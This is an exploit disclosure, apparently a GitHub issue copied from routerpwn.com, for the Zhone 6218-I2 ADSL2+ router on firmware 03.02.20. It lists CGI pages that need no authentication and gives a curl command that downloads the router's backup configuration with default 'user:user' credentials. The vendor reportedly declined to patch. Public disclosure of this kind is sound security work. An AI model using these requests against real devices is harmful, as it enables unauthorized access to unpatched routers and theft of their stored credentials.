Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Open hkm opened this issue 8 years ago • 0 comments

Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Date: 01/09/2015

ZHONE Firmware: 03.02.20

Product Name: 6218-I2-xxx

Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)

Author: Mahmoud Khaled

Contact: [email protected]

Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet

Disclosure Timeline

01/09/2015 Contacted Vendor/Vulnerability Explained 01/09/2015 Vendor Replied Denying Responsibility of The Product 01/09/2015 Full Disclosure

Description

A. The following links can be accessed without any authentication: http://<IP>/pvccfg.cgi http://<IP>/dnscfg.cgi http://<IP>/password.cgi (In addition to text storage of sensitive information)

B. Obtaining backup DSL router configurations by a user account authentication: curl ""http://<IP>/backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)

Sep 30 '15 18:09 hkm

routerpwn.com routerpwn.com copied to clipboard

Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Date: 01/09/2015

ZHONE Firmware: 03.02.20

Product Name: 6218-I2-xxx

Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)

Author: Mahmoud Khaled

Contact: [email protected]

Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet

routerpwn.com
routerpwn.com copied to clipboard